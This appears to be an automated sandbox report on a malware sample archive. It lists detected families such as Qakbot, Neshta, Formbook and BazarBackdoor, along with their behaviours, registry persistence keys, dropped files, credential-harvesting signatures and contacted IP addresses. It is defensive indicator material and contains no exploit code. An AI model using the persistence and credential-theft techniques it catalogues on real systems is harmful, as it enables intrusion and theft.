Analysis Overview
Threat Level: Known bad
The file https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z was found to be: Known bad.
Malicious Activity Summary
ostap
Formbook
Qakbot/Qbot
Oblique family
Lokibot family
Neshta family
Ostap JavaScript downloader
Ardamax main executable
Ostap family
AgentTesla
Ardamax family
Ardamax
Neshta
ObliqueRAT
Qakbot family
Agenttesla family
BazarBackdoor
Lokibot
Formbook family
Bazarbackdoor family
Detect Neshta payload
Formbook payload
Renames multiple (183) files with added filename extension
Tries to connect to .bazar domain
Blocklisted process makes network request
Adds policy Run key to start application
Drops file in Drivers directory
Drops startup file
Executes dropped EXE
Reads data files stored by FTP clients
Unexpected DNS network traffic destination
Modifies system executable filetype association
Reads user/profile data of local email clients
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Loads dropped DLL
Reads WinSCP keys stored on the system
Accesses Microsoft Outlook profiles
Adds Run key to start application
Network Service Discovery
Network Share Discovery
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Detects Pyinstaller
System Location Discovery: System Language Discovery
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
Program crash
Command and Scripting Interpreter: JavaScript
outlook_win_path
Suspicious behavior: AddClipboardFormatListener
Runs net.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies registry key
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Modifies registry class
Modifies Control Panel
outlook_office_path
Modifies Internet Explorer settings
Gathers network information
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Enumerates system info in registry
Discovers systems in the same network
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-19 14:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-19 14:00
Reported
2024-11-19 14:20
Platform
win11-20241007-en
Max time kernel
1200s
Max time network
1203s
Command Line
Signatures
AgentTesla
Agenttesla family
Ardamax
Ardamax family
Ardamax main executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
BazarBackdoor
| Description | Indicator | Process | Target |
| N/A | zirabuo.bazar | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
Bazarbackdoor family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Formbook
Formbook family
Lokibot
Lokibot family
Neshta
Neshta family
Oblique family
ObliqueRAT
Ostap JavaScript downloader
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ostap family
Qakbot family
Qakbot/Qbot
ostap
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (183) files with added filename extension
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\4HTPPL0HYBD = "C:\\Program Files (x86)\\M2d9\\IconCache3frdbf.exe" | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\cscript.exe | N/A |
Blocklisted process makes network request
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
Tries to connect to .bazar domain
| Description | Indicator | Process | Target |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
| N/A | zirabuo.bazar | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\script.lnk | C:\Users\Public\Video\hrss.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe | C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| N/A | N/A | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 139.99.96.146 | N/A | N/A |
| Destination IP | 51.255.48.78 | N/A | N/A |
| Destination IP | 77.73.68.161 | N/A | N/A |
| Destination IP | 146.185.176.36 | N/A | N/A |
| Destination IP | 46.101.70.183 | N/A | N/A |
| Destination IP | 94.177.171.127 | N/A | N/A |
| Destination IP | 31.171.251.118 | N/A | N/A |
| Destination IP | 146.185.176.36 | N/A | N/A |
| Destination IP | 178.17.170.179 | N/A | N/A |
| Destination IP | 130.255.78.223 | N/A | N/A |
| Destination IP | 107.172.42.186 | N/A | N/A |
| Destination IP | 5.135.183.146 | N/A | N/A |
| Destination IP | 147.135.185.78 | N/A | N/A |
| Destination IP | 104.37.195.178 | N/A | N/A |
| Destination IP | 81.2.241.148 | N/A | N/A |
| Destination IP | 91.217.137.37 | N/A | N/A |
| Destination IP | 185.117.154.144 | N/A | N/A |
| Destination IP | 89.18.27.167 | N/A | N/A |
| Destination IP | 172.98.193.42 | N/A | N/A |
| Destination IP | 169.239.202.202 | N/A | N/A |
| Destination IP | 51.255.48.78 | N/A | N/A |
| Destination IP | 217.12.210.54 | N/A | N/A |
| Destination IP | 192.52.166.110 | N/A | N/A |
| Destination IP | 185.117.154.144 | N/A | N/A |
| Destination IP | 94.177.171.127 | N/A | N/A |
| Destination IP | 185.208.208.141 | N/A | N/A |
| Destination IP | 138.197.25.214 | N/A | N/A |
| Destination IP | 66.70.211.246 | N/A | N/A |
| Destination IP | 139.59.208.246 | N/A | N/A |
| Destination IP | 159.89.249.249 | N/A | N/A |
| Destination IP | 107.172.42.186 | N/A | N/A |
| Destination IP | 163.172.185.51 | N/A | N/A |
| Destination IP | 176.126.70.119 | N/A | N/A |
| Destination IP | 185.121.177.177 | N/A | N/A |
| Destination IP | 63.231.92.27 | N/A | N/A |
| Destination IP | 66.70.211.246 | N/A | N/A |
| Destination IP | 87.98.175.85 | N/A | N/A |
| Destination IP | 77.73.68.161 | N/A | N/A |
| Destination IP | 87.98.175.85 | N/A | N/A |
| Destination IP | 146.185.176.36 | N/A | N/A |
| Destination IP | 172.98.193.42 | N/A | N/A |
| Destination IP | 5.45.97.127 | N/A | N/A |
| Destination IP | 89.35.39.64 | N/A | N/A |
| Destination IP | 158.69.160.164 | N/A | N/A |
| Destination IP | 107.172.42.186 | N/A | N/A |
| Destination IP | 104.37.195.178 | N/A | N/A |
| Destination IP | 94.177.171.127 | N/A | N/A |
| Destination IP | 91.217.137.37 | N/A | N/A |
| Destination IP | 147.135.185.78 | N/A | N/A |
| Destination IP | 66.70.211.246 | N/A | N/A |
| Destination IP | 111.67.20.8 | N/A | N/A |
| Destination IP | 176.126.70.119 | N/A | N/A |
| Destination IP | 87.98.175.85 | N/A | N/A |
| Destination IP | 45.63.124.65 | N/A | N/A |
| Destination IP | 51.254.25.115 | N/A | N/A |
| Destination IP | 5.45.97.127 | N/A | N/A |
| Destination IP | 35.196.105.24 | N/A | N/A |
| Destination IP | 51.254.25.115 | N/A | N/A |
| Destination IP | 142.4.204.111 | N/A | N/A |
| Destination IP | 139.59.208.246 | N/A | N/A |
| Destination IP | 104.238.186.189 | N/A | N/A |
| Destination IP | 94.177.171.127 | N/A | N/A |
| Destination IP | 178.17.170.179 | N/A | N/A |
| Destination IP | 178.17.170.179 | N/A | N/A |
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TSH Start = "C:\\PROGRA~3\\QQOFCC\\TSH.exe" | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\upgrade = "C:\\Users\\Admin\\AppData\\Local\\main.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\btqpkjb = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Mxnpxnryiygd\\sbozxh.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
Network Share Discovery
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2076 set thread context of 3532 | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | C:\Users\Admin\Desktop\HEUR-T~3.EXE |
| PID 3532 set thread context of 3284 | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | C:\Windows\Explorer.EXE |
| PID 1040 set thread context of 2060 | N/A | C:\Users\Admin\Desktop\HEUR-B~1.EXE | C:\Users\Admin\Desktop\HEUR-B~1.EXE |
| PID 3796 set thread context of 4368 | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe |
| PID 4368 set thread context of 3284 | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | C:\Windows\Explorer.EXE |
| PID 2476 set thread context of 3156 | N/A | C:\Users\Admin\Desktop\HEUR-T~1.EXE | C:\Users\Admin\Desktop\HEUR-T~1.EXE |
| PID 1968 set thread context of 1444 | N/A | C:\Users\Admin\Desktop\HEUR-T~4.EXE | C:\Users\Admin\Desktop\HEUR-T~4.EXE |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\identity_helper.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\Installer\setup.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Windows\svchost.com | N/A |
